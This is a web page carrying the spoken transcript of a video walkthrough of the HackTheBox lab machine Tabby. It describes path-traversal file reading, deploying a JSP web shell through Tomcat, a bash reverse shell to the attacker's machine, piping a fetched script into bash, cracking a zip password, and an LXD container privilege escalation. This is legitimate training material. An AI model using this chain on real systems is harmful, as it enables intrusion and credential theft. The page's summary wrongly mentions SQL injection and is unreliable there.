HackTheBox - Tabby
Skills:
Tool Use & Function Calling90%
Key Takeaways
The video demonstrates a HackTheBox challenge, specifically the Tabby machine, using tools like Nmap, Burp Suite, and curl to exploit vulnerabilities and gain access to the system. The challenge involves path traversal, file inclusion, and SQL injection attacks to ultimately read the user flag.
Full Transcript
what's going on youtube this is ipsec we're doing tabby from hack the box which was released as an easy machine but due to the exploit chains i think it may be more along the lines of a medium chain that being said all the exploits here are pretty straightforward you start off with access to both apache and tomcat the apache doesn't have any authentication tomcat does so poking around the apache web server you find a lfi vulnerability that you cannot turn into code execution but you can use it to dump configuration files so we dumped the tomcat users.xml file which grants us manager access into tomcat that gives us the ability to drop a web shell to the server and get code execution that way once on the server we have to do a little bit of magic involving cracking a zip file to get access to a user that user is a member of the lxd group so we can upload a lxc container then use that container to read files off the root file system so with all that being said let's just jump in as always we're going to start off with the nmap so dash sc for default scripts sv enumerate versions oh a i'll put all formats put in the nmap directory but before you do that we have to create that directory so put it in the directory call it tabby then the ip address which is 10 10 10 194 i am going to add the dash v flag so it shows me open ports as it finds them and i'm also going to run this with sudo and we can see a few points found right away we have 88 80 and 22 so let's take a look at port 80 because that's just http and that's generally where i like starting so go to 10 10 10 194 and we get a web page it's mega hosting dedicated service starting from 99 usd and this looks very similar to one of the boxes i've seen in hack the box battlegrounds i do see a copyright of 2016 so maybe i should be looking for some type of um cve or something because this may be the last time the page has been modified we can go over all these links i'm just seeing if they take us anywhere else i'm looking at the bottom left of my browser and i don't see it changing and nothing changing there we have an email address and a phone number but nothing too interesting again clicking the link just brings us back to the home page click on home look through each of these links i see again look at the bottom left they're going nowhere infrastructure just goes down here free trial doesn't appear to go anywhere just back home going over to this news link we can see it says megahosting.hdb news.php and i probably want to create this dns host entry before doing it because i know megahosting.hdb is not going to resolve which means i'm going to go somewhere and my dns is going to get cached so if i add this in my host entry we do um sudo vi etsy hosts and do 10 10 10 194 i actually have to helps if i don't make a typo when i type it 10 10 10 194 and the hostname is mega hosting.htb if i try to go to this domain still it's not going to exist megahosting.htb because the dns is cached i can try clearing the cache but i don't think this actually does it these are things i know to clear we can restart firefox it's probably cached in the os or something that i need to run a command but now if we go to mega megahursting.htb let's see oh it actually loaded that time maybe it's just a time thing maybe it takes a minute for dns to i guess get old and pull a new record or maybe closing an opening firefox did it or something but now when we click on this news we see we apologize to our customers for the previous data breach we have changed the site to remove this tool and invested heavily in more secure servers however we can see it's using this parameter i'm going to guess this is like statement.php or something statement.php let's see nothing maybe txt html but just thinking about how this parameter works i'm guessing file is pulling some type of file so i'm going to send this over to burp suite because i want to try path traversal to see if we can make it pull other files so let's go over to burp suite go to proxy and again the reason why i'm using flip suite to do this is because you can't really do path traversal in a web browser if i turn this off and we try like dot dot slash dot dot slash a bunch of these etsy pass wd to see what happens oh it does i'm used to web browsers and stuff um taking off fees dot dot slashes i'm not sure why it didn't do that but i always prefer exploiting and burp suite but we can see definitely works with path traversal and didn't actually expect that to work but um we could play with this more maybe like index or um maybe dot dot slash index.php and looks like we get the php page so we just try index.php what do we get nothing so the statement is in some directory we don't know where statement is but it's definitely somewhere we could probably figure this out by doing a php filter to grab the source code for this php page because if we look back at this uh oh we should grab the news.php page which will tell us exactly how this file parameter works so let's grab that um in order to grab php you will have to do php filters and i wonder if we're actually going to be able to do it with this we'll try php colon slash filter convert uh base64 encode slash resource equals i think that's it maybe it's base64.encode let's try base64.encode that one is for some reason so hard to memorize but i can just google php filter base64 encode and we'll see what we did wrong convert dot base64 so convert dot b64 dash in really convert dot basics for dash yep okay uh let's just copy this because i probably made a typo somewhere resource equals so i'm guessing we can't do this because we don't control the full path so i'm guessing if we looked at the parameter um it's something like include um path plus uh what's the argument file so since we don't control this path piece before the file we can't do this php filter so that's probably why that's not working because it looks like we have this coded correctly according to this uh we could just try news.php but yeah it's not working so i'm guessing what's getting put into file is like um for www.html uh some folder so maybe like notes and then that's what the parameter actually looks like which is invalid code but if we didn't have something before this it would work so can't do that uh we can again grab files so dot slashes etsy pass wd and we got that um the other thing i'd probably check is let's just do dot slash news.php wait we didn't need to um do that that's funny um so this is a file get contents so there's two things in php uh there's file git content and there's like include there's probably other ways to include files but these are the two main ones um include is going to execute everything within the php tag so if the file had this the include would execute this and we wouldn't be able to get the source code so that's why i was trying to do the filter um because it's probably doing the file git contents it doesn't execute code so we can just read files so we can see exactly what the code is and it's as i expected goes into a files directory and then gets that parameter so it doesn't look like there's anything we can really do with this and because we now know this won't execute code even if we find php code upload it and put it there i'm just going to switch and just look for things to extract out of this because we know this is just lfi with no possibility of code execution so we can try etsy pass wd let's try a bunch of dot dot slashes and we can see the users on this box we got home ash so let's see if i try to go home ash.ssh home ash dot ssh um authorized keys created this file we can't we shouldn't ever be able to read that file it's just again something i check checking the history doesn't look like we can get anything out of that um i'm gonna try like proc self environ uh cmd line it does work so let's see cd proc self here see what files we have um and bayern is what i wanted because this would give me the username of what i'm running i'm guessing i'm apache because cmd line apache 2k start so i'm probably the www data user or apache probably not running as ash um we can go back to the nmap to see if anything exists let's just go to a new pane go in nmap class tabby and map and oh we had tomcat running so we had a port 8080 we can look at and this is a ubuntu box but we can take a look at port 80 or report 8080 so let's go to 10 10 10 194 8080 and we just get a default tomcat page we can try slash admin uh it doesn't exist manager sweet so we can try like tomcat tomcat or admin tomcat um these are all just defaults of tomcat we can try manager tomcat i think the set list actually has a bunch of default passwords so if you didn't know the default passwords of tomcat you just go to like opsec list find dot great tomcat and it's under the passwords directory default credentials tomcat their default password list so bunch of default passwords for tomcat that we could try however we have a lfi to read files so we can probably just use this lfi here to read the tomcat users.xml file and get the password so let's go to google real quick uh location tomcat users.xml ubuntu and let's see where is it i think it's in user share so we can try this one first etsy tomcat7 so let's try this etsy tomcat 7 tomcat users doesn't exist um let's see slash user share let's see user share tomcat7 then probably etsy tomcat user share tomcat etsy maybe tomcat seven let's see sometimes getting the path is always the hardest part of lfi's so user share tomcat7 then ben catalin.h so this isn't going to give us the file we want but it's a predictable file that would help us identify for even in the right directory let's see user share tomcat7 bin catalina sh nope the other thing we could be doing wrong is um a wrong tomcat version so let's go take a look at our error message and it doesn't say anything let's just go to 8080 and we have tomcat9 so we're trying to do tomcat 7 when the server is running tomcat9 so let's try changing this to tomcat 9 catalina sh and there we go we get the directory so now we can try to figure out where the tomcat users was so was it etsy tomcat tomcat users.xml uh tomcat user.xml or is it just in etsy let's try users there we go so we found the tomcat user xml file um and here we have the credentials we have tomcat and the password is this so i'm going to go back to my box let's just open a new pane close this one to go to the tmux home and v creds tomcat and we'll do i think it was manager say what was the credential no user was tomcat yeah there we go i normally do like application user password but application username is the same thing may confuse me down the line so that's why i just did that let's see slash manager tomcat password access denied what are we user role we're admin admin gui let's see by default manager is only accessible from a browser on the same machine so let's check if um ajp is installed um ajp is like a tomcat proxy i think that's on port 8006 or 8009 but if that is it's going to allow us to proxy through the server and hit this admin page on localhost so let's do nmap dash p 8009 10 10 10 194 run it with sudo and it is closed so let's see um we may be able just to hit the upload piece manually and then do a put request so text deploy there we go so this is the endpoint in tomcat which you can interact with via command line and just deploy applications so tomcat is just a way of running a bunch of java applications that tomcat files are war files w-a-r so we said deploy tomcat um app or file curl it probably has a way like curl dash upload file um manager deploy so that's essentially what we're going to be doing um the first thing we need to do is create a warfall to work with we could either do msf venom or grab a webshell and do it through the web shell i prefer doing it through the web shell mainly just because msf venom generally does um like optimize code that i don't fully understand and i just think web shell code is easier to read uh the web shell place i like going to is called 10 c t e n n c and we're just going to clone this into our op directory so cd up get clone and i may even have this still it doesn't look like i do but now we can just go to web shell and we have a bunch of web shells so we can just do ls i think jsp's one yeah so inside of jsp um there's a lot of web shells we can choose from like that's the one downside about this repo is it's not finding the webshell you want it's deciding on the webshell you use um let's see what shell.jsp look like uh that's a lot of code to use so it's probably a good web shell but not what i want to do first um i think cmd jsp.jsp is one i generally use um you can see i can read all the code without scrolling so if something fails it's probably going to be easy to find where it failed and that's why i like this web shell so i'm going to copy this file into htb tabby and we're just gonna go there and looking at this shell uh note that linux cmd and windows cmd slash c plus cmd so we probably should go down to this exec and remove cmd.exe c because that is i guess for windows and now this web shell should work i'm going to change this form method to post just be whoa delete way too much uh just because i really don't like um doing git requests i'd rather do post because it gives me more freedom in the variables i used in my request and it also doesn't send everything to um the log file uh the input name i'm going to change from please subscribe and the main reason i do this is i never like doing a web shell and leaving all the defaults because if someone comes along and finds cmd jsp.jsp they can just look at the source see its um parameter name it uses and take advantage of that web shell so that's why i generally change that type of stuff if you screw up there's a chance that you just think your web shell doesn't work which sucks but i mean that's the issue with security every now and then security breaks something and you end up troubleshooting things i think that webshell is good so we can do um curl dash t and then cmd jsp i think that's all we need uh we need username i think in username curl is just um dash u let's go and cat credentials and i'm probably gonna send this to the proxy just so you can see it what a request looks like let's see i'm screwing all up real quick forgive me i think this is how we do user name and then 10 10 10 194 manager text deploy and what are the variables for deploy um let's see girl dash t manager text deploy there we go this looks like it's going to be good girl dash t see that's on deploy undeploy is removed so config user make this bigger for you i think it's like endpoint or app let's see it's just a config file oh there we go path path is what we want we can do path so text deploy path is equal to we'll just say slash app and let's see actually let's just wireshark this if i need pseudo wireshark uh i'll stop my head i don't know exactly how to uh send curl through a proxy it's probably dash p but this will work as well uh method not allowed manager text deploy and we didn't see anything what oh that's my own ton one there we go so this is what the request looks like we follow tcp stream you can see put and then the path authorization this is going to be the credentials here's the file i'm trying to put and it says method not allowed so oh wait i see um we're hitting apache not uh tomcat so let's go back up and we can do port 8080 and deployed application at slash app but context failed to start and this is because i'm not using a war file um tomcat doesn't know how to handle just jsps it needs to be in a war file which you can just do zip uh cmd jsp.org and then put the file name i don't know exactly why it's so specific but that's how tomcat is so let's change this to be a war file uh app already exist so we'll do i guess app two and deploy application to slash app2 let's go over and check this out so we can do mega hosting change this to port 8080 slash app2 uh cmd jsp.jsp sweet we found it um we do ls we have files so let's go intercept this again with burp suite to see if we can do this in a post request so who am i uh we have to change it to here who am i sent and we are sending it in a post request so that's what we wanted we can run any command we want but generally the command we like doing is over shell so bash dash c bash dash i dev tcp 10 10 14 my ip is not shown uh dot three uh slash nine thousand one zero at and one that should be good i'm going to run a script command and we'll say um shell dot out and all that does is it's going to log everything to shell.oi not out because i made a typo but i always like doing these when i do reverse shells just so i know what commands i sent we send this and and we actually did not get a shell um c bash i weird oh probably url in code so let's highlight this ctrl u send and we still did not get one let's see i think that is right but maybe we just can't do this type of reverse shell so let's do google and go to reverse shell cheat sheet to try a different shell shell cheat sheet contest monkey uh i hate when this happens there we go so bash dash i looks like that's correct i'm going to try something let's just try full path ipad 10 10 14 3. that's definitely it let's see has been bash is that where it is which bash user been bash we can try that path still nothing so i just don't think it likes this type of reverse shell which is fine uh we can try we could have put this in the jsp file probably and had that work um this is the other one i like trying so we can go back here i'm gonna do which nc we have nc on the box uh we could probably nc-h to get a help maybe not let's put this to 10 10 14 3 port 9001 control u run it and we still don't get a shell so what i'm going to do is see if we can even hit this port it could be a firewall so which curl we have curl in the box curled 10 10 14 3 9 01 we hit it so maybe it's just this reverse shell uh or this command shell thing doesn't like uh sending all these special characters in this so what we can do is save a file to the disk so i'm going to make the dub dub dub i'm going to do shell.sh bash c i um was it and like that or like that i think dev tcp 10 10 14 3 9 000 1 0 and 1 okay and we can do python3-m http.server sudo listening on port 8000 so we can curl 8000 shell dot sh and we get that file we can output it to temp sh yeah tempest h is fine so we save that file to the disk and now we can just try to execute it bash temp sh and do we still have a reverse shell we don't i'm going to exit and then we're going to run the script command again because we have so much like just pollution in that log file so lvnp 9001 and we got a shell so this uh reverse shell payload or not reverse shell this cmd jsp.jsp just didn't like all the special characters so that's why we wrote it to a file and then execute the file because we got around special characters uh the other thing we could try doing is if we didn't want to touch disk we could potentially pipe that over to bash and it doesn't work because again that special character so there's probably a way around it if you want you can play with it for me i'm just going to do bash town sh to get the reverse shell so we can do export term is equal to x term so we can clear the screen i thought we could be able to clear the screen there we go and begin poking around at this box the first thing i want to do is look for where my application's actually installed i'm going to guess it's in this web apps directory and the reason why i want to see where it's installed is just to see if there's other applications um we can see we got app 2.1 app2 um app.where i think this is just the jsp file we had uploaded so yeah that's just the jsp file so that's why tomcat errors it expects a war file which is really just a zip and then it unzips it since the very first time we did this exploit we didn't give it a zip it failed unzipping it and that was the issue we don't see any applications we don't expect here so i'm going to guess that tomcat we don't need to go to uh oh i don't have a reverse um a tty so i hit tab and it couldn't auto complete so i'm gonna do python three dash c import pty pty dot spawn then bin bash okay and then ctrl z sdty raw minus echo hit fg enter twice and now we'll be able to do like tab autocomplete and things like that um also i can just hit control l to clear the screen instead of control l then enter to send that key but let's go to verb www.html to see if we missed anything in this directory there is a readme.txt that looks like we missed but there's nothing important there um there is the files directory so this is where the statement was then we have revoked search archive and this backup file i'm just gonna do find dot dash type f to see what's there in a file and archiving rev certs is empty but this backup is not so i'm going to do a du hs on the backup file uh 12k can we just base64 that then let's see go up yeah it's not big and then copy this all to the clipboard and we'll put it back on our machine there's a bunch of ways we could copy the file but that's generally how i like doing it if it's a small file so this will be uh backup.zip.b64 paste base64-d backup now backup.zip and then we can unzip the backup and it wants a password password is password nope password1 nope so we don't have the password so do we have a zip to john we do so we can do zip to john on backup.zip wait what okay here it is i don't know why it output a lot more i expected just to get the hash but okay see pk zip2 guessing this is what we want actually it's probably this whole line so what i'm thinking is um this whole line we got the file name the hash and then the files within the zip um i'm going to try out putting this to a file and we can just call it hash.zip and awesome so all these we're not going to send it out maybe this is standard error message so let's see if we ran to devnl we only get the hash so yeah i think this is standard error but if we cat would we call it zip we get the thing we can pass over to john so we can copy this and then i'm going to go over to the kraken which is just a box in my basement that i use for cracking machines or cracking hashes and the reason why i always do it separately is because number one you shouldn't crack things in a vm and number two i don't like cracking things on my host operating system where i'm recording videos because i may drop frames so i'm gonna create the file tabby and we're gonna put it here and hashcat i don't think cracks zips so we have to use john so i'm gonna opt and then i have john installed and just john i can do dot slash john um home tabby and then dash dash word list is equal to um opt word list rock you text and it says it has cracked as the password admin at it you can also do show and i'll go through john's like pot file and tell you the password so we have it right here but we can get out of the kraken and we'll try to unzip it so i'm going to make the temp i'm just going to move backup.zip inside of temp and the reason why i'm moving it in this folder is because when you unzip things sometimes they have a tendency of dropping files in the current working directory instead of creating a new one which then just creates a whole mess so uh let's do that put admin it as the password it was in my clipboard and we have a few files um index.phpnews.php so let's go over to this and let's see do we have like a password in this i password dot i'm going to do dash capital r to be recursive uh db pass username and i'm going to make sure this is working with main and i just said main because i read main there so we know we'd grab something um we could potentially md5 some every file and we'll send this to pane one let's see we can just exit here and md5 sum the files here we gotta go up a directory md five sum everything here and we can see readme looks to be the same index there's a difference of index uh see base64 w0 index.php see i think let's just not do w0 uh i'll put an echo afterwards so it puts a blank line there we go so now we can grab index.php and we'll see what the difference is we just got to put this on the same box where index.php is so index.php.2. can we write a file see we can't so let's go to cd temp and the other thing i forgot was this was base64 so index.php.b64 uh that's not it there we go base64-d index.php.b64 to index.php and we can do a diff on the two files so index.php var dub dub dub html index.p what maybe five sum uh did i just copy the wrong file that's something i would do base64 index.php dash w0 echo yeah i probably copy the wrong file now that i'm looking at this so copy that and we can do vi i'm just going to do i.b64 paste base64-d i.b64 to index.php diff and less dash s maybe some things are different um like it looks like the call lost phone number is different uh the email is different so xspeed studio at gmail versus sales at mega hosting so it looks like they grabbed a bootstrap template from somewhere and just changed some information on the template since those things change so it's not like connecting to a database and doing something um and a cat etsy pass wd and we do have that ash user i'm gonna try sq dash ash and admin at it i think with the password and that is ash's password well we could try it as root admin at it and it doesn't look like we can sudo l admin at it what run sudo ts at that's weird ash may not run pseudo on tabby i'm going to try sshing ash at 10 10 10 194 except the fingerprint and we can't get in let's see cdhome.ssh dot ssh go n ssh ssh key gen f id rsa and then we'll cat id rsa.pub2 authorized keys and i'm just making this so we can ssh into the box because i like having an shl more than a reverse shell number one i mean it stands out if we do ps aef dash dash forest and we can see what a shell looks like that looks bad also like the tty and everything is just perfect so that's why i like ssh uh v id rsa paste the key chmod 600 id rsa we can get rid of this wireshark sh dash ash at 10 10 10 194 and we get in with ssh so we can exit all this uh reset here and the script is done so if we wanted to we can less shell.out and we can see everything we did on the box so if we ever forgot the password for ash and we didn't write it down we could just go back here and should show um admin su-ash so maybe the password actually did not show in the script um but yeah maybe if we strings it out i admin yeah maybe script won't go and grab that password prompt interesting but we are on the password the box as ash so we can do a fine dot to see what else there is here we created that ssh key we can look at bash history nothing there we did lsla we would see it's mounted to devgnol so we don't really have anything to go off of so i'm gonna go to dev shm and run lin ps so cd dub dub dub copy up privilege escalation script awesome suite lynn p's lynn ps.sh here and curl 10 10 14 3 port 8 000 linps.sh type it over to bash and then we just got to start a python server and it's going to run lin p's so i will pause the video and we'll resume when this is done it only takes a few minutes so yeah lin p's is finished so i'm going to search back for 99 because 99 doesn't really exist anywhere and generally gets me to the top of len p's output so that's why i like doing it and i'm just going to search for where i see highlighted yellow and right off the bat um i see user groups and lxd so lxd is commonly associated with the privacy i'm going to just press page down to see if we see any other ones that are just highlighted in yellow that stick out but that's gonna be the first thing i take a look at because um that's where it's highlighted so we have it highlighted there let's see super user ash is highlighted because that's our username so that's nothing adm that doesn't look like anything so again just looking for that highlighted yellow and doesn't look like we have anything but i'm going to go to google and say um lxe privasc hack tricks and then go to this very top one this book.hacktricks.xyz is just a really good reference point when you're looking to do things so for this to work we have to create a container and then we upload the container load it and then that container can read files on the root disk so this is going to be installing things on our box so let's run all of this uh i just copy that and we can paste so paste doesn't look like it did all that much so the last command it ran was this w get so apt wait i don't think it did the apt update and everything what yeah that did not do everything so let's just copy these one at a time so studio app update the next one's going to be install i don't think i have the squash fs tools so that's what we're gonna have to do so install looks like it is installing something then we have to do a go get to clone the repel and then we go in so i'm just gonna pause the video let this apt finish installing and now that it's done installing we can go and do this next one which is a go get go into that directory make cd it's where they were to do cd command with no arguments so we'll do cd after this finishes okay run cd i guess cd with no arguments goes to your home directory today i learned uh do that we can go into this directory then download this then we do this command and bad alpine release that's not good see home distributor build linux okay i guess maybe this version is just too old um search for that and would we download this images alpine.yaml this is a master that shouldn't be that should be most up-to-date let's see got this error message see expected say run by a server um this looks like the simplest solution let's try adding that so dash o hey it's doing something so i think that's what we needed uh that dash l and i think we have that lxd.tar.xz i think that's the file we want so let's see yep that's what we want so we want to send this file over to the target so let's do move lxd tar and root.rootfs.squashfs to hdb tabby dub dub dub then we can download them so i'm just going to go in the temp directory these files could be big so that's why i'm doing it in temp and not in dev shm let's do python and wget 1010 14 3 slash lxd.tar.xzzz i'll port 8000 then we need to do root dot squash fs file not found uh root fs dot squash fest uh rude ass there if i can type or talk it would definitely help me there we go root fs dot squash fest so now we got both of those files so we should be able to do the lxd import and now we can do image list i guess we should have done this image list before importing because it could have been a machine but it doesn't look like there was and then we run this next command so what this is going to do is start up the container or take this image create it as a container called privesque and set security privilege to true which i believe gives it access over the um host disk and no storage pool found let's see let's do alexey list real quick to see if that exists now it does not so i think we have to create a storage pool so again let's search this error message see how to fix this solution lxd in it does have us run nope let's try lxd init uh no sure yes i guess just choose default options so many options sure let's see does this create now we can try this one init command there we go so now if we do lxe list we have our container privesque and that is security privilege true so this one is going to add the um host root of slash to mount root enter container and recursive is going to allow us to go through directories okay so we have now added a new mount point to this container and the mount point slash mount slash root points to our host disk of slash so we can start the container and then we can execute so lxe exec prives that's the name of the container then sh and do id we a root in our container if we do uh cd slash uh we can go to what was it mount root and now we are root in our host operating system so we can probably just go to root again and there's root.text we go dot ssh and there is an id rsa key so we can just copy this and we'll save this on our disk as root and shn as root so let's do v um let's do a new window v root dot key we will paste chmod 600 root key sh sh-i and then root at 10 10 10 194 and we're in as root so that is the box hope you guys enjoyed take care and i will see you all next time
Original Description
00:00 - Intro
00:55 - Start of Nmap
01:25 - Taking a look at the web page
02:40 - Discovering Megahosting.HTB and adding it to /etc/hosts
04:04 - Playing with news.php and explaining the logic of LFI
08:40 - Discovering it is a file_get_contents(), which means we can skip all our "RCE Tests" as it won't execute PHP Code
11:20 - Poking at Tomcat and hunting for its tomcat-users.xml file to use with our LFI on apache2
17:30 - Uploading a JSP Webshell to tomcat with credentials found in tomcat-users.xml
20:20 - Using Curl to upload the JSP webshell.
23:10 - Whoops was uploading to the wrong port and then forgot to convert the JSP to a WAR File
25:38 - Reverse shells having trouble running due to bad characters.
27:55 - Downloading the shell to disk, then executing it in order to avoid special characters
31:15 - Reverse shell returned and TTY fixed. Discovering an encrypted zip file that we crack with John
35:00 - Exploring the Zip file to find there's nothing really interesting
39:00 - Trying the zip password as users on the box and getting a shell as Ash, dropping an SSH key and logging in with ash
42:00 - Running linpeas
43:00 - Discovering user is a member of LXD Group
44:42 - Building an alpine container, then uploading it to the target machine
47:45 - Uploading the alpine container and using lxc to privesc
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Tool Use & Function Calling
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
5 Best BrowserStack Alternatives to Optimize Your Testing Infrastructure
Medium · DevOps
️ The Lifecycle Symphony: A Senior SRE’s Deep Dive into Init and Sidecar Containers
Medium · DevOps
`wrangler dev --remote` silently writes to your production KV namespace — here's the fix
Dev.to · 강해수
Qwen 3.6 27B Is the Local Dev Sweet Spot — Here's Why
Dev.to · Carter May
Chapters (19)
Intro
0:55
Start of Nmap
1:25
Taking a look at the web page
2:40
Discovering Megahosting.HTB and adding it to /etc/hosts
4:04
Playing with news.php and explaining the logic of LFI
8:40
Discovering it is a file_get_contents(), which means we can skip all our "RCE
11:20
Poking at Tomcat and hunting for its tomcat-users.xml file to use with our LFI
17:30
Uploading a JSP Webshell to tomcat with credentials found in tomcat-users.xml
20:20
Using Curl to upload the JSP webshell.
23:10
Whoops was uploading to the wrong port and then forgot to convert the JSP to a
25:38
Reverse shells having trouble running due to bad characters.
27:55
Downloading the shell to disk, then executing it in order to avoid special cha
31:15
Reverse shell returned and TTY fixed. Discovering an encrypted zip file that
35:00
Exploring the Zip file to find there's nothing really interesting
39:00
Trying the zip password as users on the box and getting a shell as Ash, droppi
42:00
Running linpeas
43:00
Discovering user is a member of LXD Group
44:42
Building an alpine container, then uploading it to the target machine
47:45
Uploading the alpine container and using lxc to privesc
🎓
Tutor Explanation
DeepCamp AI